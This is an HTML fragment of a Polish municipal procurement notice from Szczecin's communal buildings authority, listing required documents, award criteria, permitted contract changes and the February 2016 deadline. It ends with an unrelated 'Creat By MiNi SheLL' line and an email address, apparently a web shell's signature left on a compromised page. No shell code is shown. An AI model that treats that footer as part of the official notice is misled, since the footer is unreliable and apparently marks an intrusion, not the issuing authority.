<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) oferta cenowa zgodnie z Rozdziałem I ust. 3 siwz; W przypadku składania oferty wspólnej należy złożyć jeden dokument,
2) odpowiednie pełnomocnictwa; tylko w sytuacjach określonych w Rozdziale I ust. 5 zdanie 2 siwz lub w przypadku składania oferty wspólnej (Rozdział III ust. 1 siwz), 
3) oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz wskazujące część zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli wykonawca przewiduje udział podwykonawców); W przypadku składania oferty wspólnej należy złożyć jeden dokument, 
4) oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, że wykonawca na 2 dni przed podpisaniem umowy przedłoży kosztorysy szczegółowe dla każdej z branż oddzielnie, dla każdego lokalu mieszkalnego, sporządzone zgodnie z postanowieniami Rozdziału X siwz. W przypadku składania oferty wspólnej należy złożyć jeden dokument, 
5) oświadczenie według wzoru stanowiącego załącznik nr 1 do siwz, potwierdzające, że wykonawca przed podpisaniem umowy przedłoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie niższą niż wysokość wynagrodzenia na czas trwania robót budowlanych. W przypadku składania oferty wspólnej należy złożyć jeden dokument.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W związku z art. 144 ust. 1 ustawy Prawo zamówień publicznych Zamawiający dopuszcza zmiany zawartej umowy w zakresie: 
1) terminu wykonania zamówienia 
a)	w przypadku wystąpienia okoliczności nieprzewidzianych i niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy,
b)	w przypadku wystąpienia okoliczności leżącej po stronie Zamawiającego, w szczególności wstrzymania robót przez Zamawiającego, konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji technicznej,
c)	w przypadku warunków pogodowych uniemożliwiających ze względów technologicznych prowadzenie robót - pomimo dołożenia przez Wykonawcę wszelkich starań, aby roboty mogły zostać zrealizowane,
d)	w przypadku wystąpienia robót zamiennych, przez które rozumie się roboty, które nie wykraczają poza przedmiot zamówienia, wprowadzające jedynie zmiany ulepszające, zapewniające osiągniecie celu procesu budowlanego, rozwiązanie zamienne w zakresie rodzaju zastosowanych materiałów w technologii wykonywanych robót, zmiana technologii wykonania robót, a ich wystąpienie będzie miało istotny wpływ na przesunięcie terminu zakończenia robót,
e)	w przypadku wystąpienia  przeszkody o obiektywnym charakterze (zdarzenie nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia, a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej. Strony zobowiązują się do natychmiastowego poinformowania się nawzajem o wystąpieniu ww. przeszkód.

2) osób przewidzianych do realizacji umowy po stronie Wykonawcy (ujętych w wykazie zawartym w ofercie), pod warunkiem, że nowe osoby będą posiadały kwalifikacje zgodne z wymogiem opisanym w siwz. Zmiana taka będzie dopuszczalna w przypadku choroby, wypadku, śmierci lub w sytuacji, gdy osoba przewidziana do realizacji umowy, nie wywiązuje się należycie ze swoich obowiązków lub z innej niezależnej od Wykonawcy przyczyny. Zmiana osób wymaga zgody Zamawiającego, pod rygorem odstąpienia od umowy lub zapłaty kary umownej wskazanej w § 12 ust. 1 pkt 5 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zbilk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków i Lokali Komunalnych ul. Mariacka 25, 70-546 Szczecin, pokój nr 12 (po okazaniu dowodu wpłaty na kwotę 50 zł na konto 91 1020 4795 0000 9202 0292 7580)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2016 godzina 10:00, miejsce: Zarząd Budynków i Lokali Komunalnych ul. Mariacka 25, 70-546 Szczecin, pokój nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z art. 24 ust. 2a ustawy Prawo zamówień publicznych Zamawiający wyklucza z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych, jeżeli Zamawiający przewidział taką możliwość wykluczenia Wykonawcy w ogłoszeniu 
o zamówieniu, w specyfikacji istotnych warunków zamówienia lub w zaproszeniu do negocjacji. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com